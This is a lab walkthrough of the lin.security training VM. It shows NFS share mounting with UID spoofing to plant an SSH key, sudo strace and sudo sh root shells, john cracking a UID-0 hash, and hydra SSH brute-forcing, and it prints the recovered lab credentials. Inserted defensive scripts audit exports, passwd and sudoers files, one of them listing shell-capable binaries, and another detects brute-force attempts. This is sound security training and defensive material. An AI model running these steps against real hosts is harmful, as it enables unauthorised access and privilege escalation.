Lin.Security.1 Walkthrough (OSCP Prep)
Host Discovery
First things first, let’s find the target on our network.
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ sudo arp-scan -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:4c:9e:c7, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1 00:50:56:c0:00:08 VMware, Inc.
10.0.10.2 00:50:56:f3:16:00 VMware, Inc.
10.0.10.103 00:0c:29:ed:97:a9 VMware, Inc.
10.0.10.199 00:50:56:fa:ab:65 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 4 responded
We find the target machine at 10.0.10.103. We can update /etc/hosts to make things easier:
10.0.10.103 linsecurity
Scanning
Now let’s see what this host has open to us.
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ rustscan -a linsecurity -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.
[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.103:22
Open 10.0.10.103:111
Open 10.0.10.103:2049
Open 10.0.10.103:34199
Open 10.0.10.103:45371
Open 10.0.10.103:47855
Open 10.0.10.103:60961
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.103
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-10 19:27 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:27
Scanning 10.0.10.103 [2 ports]
Completed Ping Scan at 19:27, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:27
Scanning linsecurity (10.0.10.103) [7 ports]
Discovered open port 111/tcp on 10.0.10.103
Discovered open port 22/tcp on 10.0.10.103
Discovered open port 45371/tcp on 10.0.10.103
Discovered open port 2049/tcp on 10.0.10.103
Discovered open port 60961/tcp on 10.0.10.103
Discovered open port 47855/tcp on 10.0.10.103
Discovered open port 34199/tcp on 10.0.10.103
Completed Connect Scan at 19:27, 0.00s elapsed (7 total ports)
Initiating Service scan at 19:27
Scanning 7 services on linsecurity (10.0.10.103)
Completed Service scan at 19:27, 6.01s elapsed (7 services on 1 host)
NSE: Script scanning 10.0.10.103.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.02s elapsed
Nmap scan report for linsecurity (10.0.10.103)
Host is up, received conn-refused (0.00025s latency).
Scanned at 2021-11-10 19:27:53 CST for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
34199/tcp open mountd syn-ack 1-3 (RPC #100005)
45371/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
47855/tcp open mountd syn-ack 1-3 (RPC #100005)
60961/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds
We see rpcbind running and a number of ports running mountd. The first thing we should do is enumerate any available network shares:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ showmount -e linsecurity
Export list for linsecurity:
/home/peter *
We find what appears to be a user’s home directory shared across the network. If we can write to the directory, it should be fairly easy to get access to the machine.
Exploiting a Shared Home Directory
Let’s create a local directory and mount the network share:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ mkdir peter
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ sudo mount -t nfs linsecurity:/home/peter ./peter -o nolock
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ cd peter
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ ls -la
drwx------@ - cvechecker inetsim 10 Jul 2018 .cache
drwx------@ - cvechecker inetsim 10 Jul 2018 .gnupg
drwxrwxr-x@ - cvechecker inetsim 10 Jul 2018 .local
.rw-r--r--@ 220 cvechecker inetsim 9 Jul 2018 .bash_logout
.rw-r--r--@ 3.8k cvechecker inetsim 9 Jul 2018 .bashrc
.rw-rw-r--@ 0 cvechecker inetsim 10 Jul 2018 .cloud-locale-test.skip
.rw-r--r--@ 807 cvechecker inetsim 9 Jul 2018 .profile
There is nothing immediately interesting here, but do we have write access?
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied
So we don’t have write access, but this is easy to get around. Unless an export squashes all users, an NFS server using AUTH_SYS trusts whatever UID the client presents, so we need to log in (locally) as a user with the same user ID as the owner of this directory. The UID is 1001 (if you don’t see this, you can verify with the stat utility). On my machine, you can see there is already a user cvechecker with this ID. If there is no such user on your machine, you can create one with the useradd command and its -u option.
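The weakness this step relies on is an export that hands out a home directory to any host and honours client-supplied UIDs. The following script is an added example, not part of the original post or of the lin.security VM: it parses an /etc/exports file and flags the options that let a client choose its own identity on the share. The sample exports text is constructed (the VM's real exports file is not shown above, and rw is assumed for the peter share since the later write succeeds).

```python
import re

# Client host specs that mean "anyone who can reach port 2049".
ANY_HOST = {"*", "0.0.0.0/0", "0/0"}

# Constructed sample (not the VM's real /etc/exports). The first line mirrors
# the share found with showmount above; rw is an assumption.
SAMPLE_EXPORTS = """\
# /etc/exports: constructed example
/home/peter     *(rw,sync)
/srv/backup     10.0.10.0/24(ro,sync,all_squash)
/srv/iso        10.0.10.50
"""

# "host(opt,opt)" or just "host"; "(opt)" with no host means every host.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Yield (path, host, options) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]  # no client spec = everyone
        for client in clients:
            m = CLIENT_RE.match(client)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            yield path, host, opts


def audit_export(path, host, opts):
    """Return the findings for one (path, host, options) triple."""
    findings = []
    if host in ANY_HOST:
        findings.append("exported to every host")
    if "rw" in opts:
        findings.append("writable export")
    if "no_root_squash" in opts:
        findings.append("no_root_squash: client root is root on the server")
    if "all_squash" not in opts:
        findings.append("client UIDs honoured as-is (no all_squash): "
                        "a client user with a matching UID owns the files")
    if "insecure" in opts:
        findings.append("insecure: requests accepted from unprivileged client ports")
    if path.startswith("/home/"):
        findings.append("home directory export: .ssh/authorized_keys is reachable")
    return findings


def audit_exports(text):
    """Map 'path host' -> findings for every export in the file."""
    return {f"{path} {host}": audit_export(path, host, opts)
            for path, host, opts in parse_exports(text)}


if __name__ == "__main__":
    for export, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(export)
        for finding in findings:
            print("  -", finding)
```

Run against a real file with audit_exports(open("/etc/exports").read()); the fix for the peter share is to restrict the client list and add all_squash (or not export home directories at all).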
Now we should be able to start a shell with the correct user ID and write to the mounted directory:
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ sudo -u cvechecker bash
[cvechecker@apophis peter]$ mkdir .ssh
Now we can add our SSH public key to the .ssh/authorized_keys file and try to SSH in:
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ ssh -l peter linsecurity
Enter passphrase for key '/home/ori0n/.ssh/id_rsa':
[lin.security ASCII-art banner]
Welcome to lin.security | https://in.security | version 1.0
And we’re in!
There are a number of different routes to root on this box. I’ll cover three here.
Privilege Escalation – First Method
Having obtained access as user peter, let’s see if he has any sudo privileges on the machine:
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
So he can run strace with superuser privileges. A quick check of GTFOBins shows this may be used to spawn a root shell. Let’s try it:
peter@linsecurity:~$ sudo strace -o /dev/null sh
# id
uid=0(root) gid=0(root) groups=0(root)
Well, that was easy!
Privilege Escalation – Second Method
That was too easy! Let’s see if we can find another way in. What other users are on the system?
peter@linsecurity:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bob:x:1000:1004:bob:/home/bob:/bin/bash
statd:x:111:65534::/var/lib/nfs:/usr/sbin/nologin
peter:x:1001:1005:,,,:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
susan:x:1002:1006:,,,:/home/susan:/bin/rbash
One thing that sticks out is the insecurity user. Beyond the username itself, there are two things of note:
- The user’s UID:GID is 0:0 (root!)
- The user’s password hash is clearly visible
So if we can crack this hash, we should be able to log in with root privileges! Since I’m running on a VM, I’ll use john to attempt to crack this hash:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ echo AzER3pBZh6WZE > hash
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed. CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message. If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd (?)
1g 0:00:00:00 DONE (2021-11-10 20:36) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..bibiana
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we have the password: P@ssw0rd.
Does it work?
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ ssh -l insecurity linsecurity
insecurity@linsecurity's password:
[lin.security ASCII-art banner]
Welcome to lin.security | https://in.security | version 1.0
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
# id
uid=0(root) gid=0(root) groups=0(root)
Bingo!
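Both problems with the insecurity account (a second UID 0 and a hash sitting in the world-readable /etc/passwd rather than /etc/shadow) are mechanical to check for. The script below is an added example, not part of the original post: it parses passwd-format lines and reports non-root UID 0 accounts, unshadowed or empty password fields, and shared UIDs. The sample is a constructed subset of the /etc/passwd lines shown above.

```python
from collections import Counter

# Password-field values that mean "see /etc/shadow" or "locked". Anything else
# is a hash (or an empty password) sitting in a world-readable file.
SHADOW_MARKERS = {"x", "*", "!", "!!", "*NP*"}

# Constructed sample: a subset of the /etc/passwd lines shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1004:bob:/home/bob:/bin/bash
peter:x:1001:1005:,,,:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
susan:x:1002:1006:,,,:/home/susan:/bin/rbash
"""


def parse_passwd(text):
    """Return one dict per well-formed seven-field passwd line."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a fuller audit would report it too
        name, pw, uid, gid, _gecos, home, shell = fields
        try:
            entries.append({"name": name, "pw": pw, "uid": int(uid),
                            "gid": int(gid), "home": home, "shell": shell})
        except ValueError:
            continue  # non-numeric uid/gid; likewise worth reporting
    return entries


def audit_passwd(text):
    """Map account name -> findings; accounts with no findings are omitted."""
    entries = parse_passwd(text)
    uid_users = Counter(e["uid"] for e in entries)
    findings = {}
    for e in entries:
        hits = []
        if e["uid"] == 0 and e["name"] != "root":
            hits.append("UID 0 account other than root")
        if e["pw"] == "":
            hits.append("empty password field")
        elif e["pw"] not in SHADOW_MARKERS:
            hits.append("password hash stored in /etc/passwd instead of /etc/shadow")
        if uid_users[e["uid"]] > 1:
            hits.append(f"UID {e['uid']} shared with another account")
        if hits:
            findings[e["name"]] = hits
    return findings


if __name__ == "__main__":
    for name, hits in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{name}: {'; '.join(hits)}")
```

On a live system the same call is audit_passwd(open("/etc/passwd").read()); root will always show the shared-UID finding whenever a second UID 0 account exists, which is the signal to chase.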
Privilege Escalation – Third Method
Finally, let’s use the usernames we enumerated from /etc/passwd and see if we can crack any particularly bad passwords. Create a file (users.txt) with a list of the usernames we found:
bob
susan
I’ll ignore the peter and insecurity users because we already have access to them. Now, use hydra to try to brute-force a password. Since brute-forcing SSH is very slow, we will use a small wordlist:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ hydra -L users.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt linsecurity ssh -t 4
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 20:42:54
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:2/p:500), ~250 tries per task
[DATA] attacking ssh://linsecurity:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 956 to do in 00:22h, 4 active
[22][ssh] host: linsecurity login: bob password: secret
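From the target's side, a hydra run like the one above leaves a burst of "Failed password" lines from one source in /var/log/auth.log, followed by an "Accepted" line once a guess lands. The detector below is an added example, not part of the original post: it parses sshd log lines, keeps a per-source sliding window of failures, and raises one alert when the window crosses a threshold and a second when a login from an already-flagged source succeeds. The log lines are constructed (timestamps, PIDs and ports are made up), and the threshold and window are assumed values to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Ubuntu sshd syslog lines: "Failed password for [invalid user] X from IP port N ssh2"
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2$")

THRESHOLD = 5                   # assumed: failures per source inside the window
WINDOW = timedelta(minutes=1)   # assumed: sliding window length

# Constructed sample: a short password-guessing burst then a successful login,
# plus an unrelated single failure and key-based login from another host.
SAMPLE_AUTH_LOG = """\
Nov 10 20:43:01 linsecurity sshd[1201]: Failed password for invalid user admin from 10.0.10.10 port 50210 ssh2
Nov 10 20:43:03 linsecurity sshd[1203]: Failed password for bob from 10.0.10.10 port 50212 ssh2
Nov 10 20:43:04 linsecurity sshd[1205]: Failed password for susan from 10.0.10.10 port 50214 ssh2
Nov 10 20:43:06 linsecurity sshd[1207]: Failed password for bob from 10.0.10.10 port 50216 ssh2
Nov 10 20:43:07 linsecurity sshd[1209]: Failed password for susan from 10.0.10.10 port 50218 ssh2
Nov 10 20:43:09 linsecurity sshd[1211]: Failed password for bob from 10.0.10.10 port 50220 ssh2
Nov 10 20:43:10 linsecurity sshd[1213]: Accepted password for bob from 10.0.10.10 port 50222 ssh2
Nov 10 20:51:30 linsecurity sshd[1300]: Failed password for peter from 10.0.10.50 port 40100 ssh2
Nov 10 20:51:35 linsecurity sshd[1302]: Accepted publickey for peter from 10.0.10.50 port 40102 ssh2
"""


def parse_line(line, year=2021):
    """Return a dict for an sshd auth line, or None for anything else.

    syslog timestamps carry no year, so one is supplied by the caller.
    """
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return (timestamp, alert_type, source, detail) tuples in log order."""
    recent = defaultdict(deque)  # src -> failure timestamps inside the window
    flagged = set()              # sources already reported as brute-forcing
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["src"]]
        while q and ev["ts"] - q[0] > window:  # expire old failures
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["src"] not in flagged:
                flagged.add(ev["src"])
                alerts.append((ev["ts"], "BRUTE_FORCE", ev["src"],
                               f"{len(q)} failures within {window}"))
        elif ev["src"] in flagged:
            # A success after a guessing burst is the high-priority signal.
            alerts.append((ev["ts"], "SUCCESS_AFTER_BRUTE_FORCE", ev["src"],
                           f"login as {ev['user']}"))
    return alerts


if __name__ == "__main__":
    for ts, kind, src, detail in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(ts, kind, src, detail)
```

The second alert type is the one worth paging on: a burst alone may be noise or a locked-out user, but a success from the same source inside the window means the guessed credential is now in use.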
After a few minutes, we have creds: bob:secret. SSH in and see what Bob can do:
bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
/usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
/usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
One has to wonder why not just allow full sudo access if you’re going to allow all of these programs. GTFOBins will find ways to a root shell for many (if not all) of these programs, but we have shells available, so I’ll take the simplest route:
bob@linsecurity:~$ sudo sh
# id
uid=0(root) gid=0(root) groups=0(root)
And there you have it.
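Both of the sudo rules seen on this box (peter's NOPASSWD strace and bob's list of shells and interpreters) are the kind of thing a sudoers review should catch before an attacker does. The script below is an added example, not part of the original post: it parses sudoers-style rule lines and flags NOPASSWD, ALL, and commands drawn from a constructed, deliberately partial list of binaries that can hand the caller a shell or arbitrary file writes (GTFOBins is the fuller reference). The sample rules are constructed to mirror the two sudo -l outputs above; the susan rule is invented to show a restricted entry that passes.

```python
import re

# Constructed, partial list: binaries that can spawn a shell, run arbitrary
# commands or write arbitrary files when run under sudo. Taken from the rules
# shown above; extend it from GTFOBins for real use.
SHELL_CAPABLE = {
    "/bin/sh", "/bin/bash", "/bin/dash", "/bin/ash", "/bin/csh", "/usr/bin/zsh",
    "/usr/bin/awk", "/usr/bin/perl", "/usr/bin/tclsh", "/usr/bin/env",
    "/usr/bin/find", "/usr/bin/vi", "/usr/bin/rvim", "/usr/bin/pico", "/bin/ed",
    "/usr/bin/less", "/bin/more", "/usr/bin/man", "/usr/bin/expect",
    "/usr/bin/script", "/usr/bin/git", "/usr/bin/strace", "/usr/bin/socat",
    "/usr/bin/ssh", "/usr/bin/scp", "/usr/bin/curl", "/usr/bin/ftp",
}

# Constructed sudoers lines equivalent to the `sudo -l` outputs above, plus an
# invented restricted rule for susan.
SAMPLE_SUDOERS = """\
# constructed example
peter ALL=(ALL) NOPASSWD: /usr/bin/strace
bob   ALL=(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /usr/bin/curl, /usr/bin/vi
susan ALL=(root) /usr/bin/systemctl restart nginx
"""

# user host=(runas) [TAG:] cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")


def parse_rule(line):
    """Parse one sudoers rule line; returns None for comments and non-rules."""
    m = RULE_RE.match(line.strip())
    if not m or line.lstrip().startswith("#"):
        return None
    tags, cmds = set(), []
    for part in m["cmds"].split(","):
        part = part.strip()
        t = TAG_RE.match(part)
        while t:  # a tag may prefix any command in the list
            tags.add(t.group(1))
            part = part[t.end():]
            t = TAG_RE.match(part)
        cmds.append(part)
    return {"user": m["user"], "host": m["host"], "runas": m["runas"] or "root",
            "tags": tags, "cmds": cmds}


def audit_rule(rule):
    """Return findings for one parsed rule."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: no credential needed")
    if "ALL" in rule["cmds"]:
        findings.append("ALL: unrestricted command")
    # A bare path allows any arguments; a path with arguments is pinned to them,
    # but an interpreter or editor escapes to a shell either way.
    risky = [c for c in rule["cmds"] if c.split()[0] in SHELL_CAPABLE]
    if risky:
        findings.append("shell-capable binaries: " + ", ".join(risky))
    return findings


def audit_sudoers(text):
    """Map user -> accumulated findings across all of that user's rules."""
    findings = {}
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule:
            findings.setdefault(rule["user"], []).extend(audit_rule(rule))
    return findings


if __name__ == "__main__":
    for user, hits in audit_sudoers(SAMPLE_SUDOERS).items():
        print(f"{user}: {hits or 'ok'}")
```

This handles plain rule lines only; real sudoers files also carry Cmnd_Alias and User_Alias definitions and #include directives, which this parser skips, so run it over the expanded output of visudo -c or sudo -l rather than trusting it on a raw file with aliases.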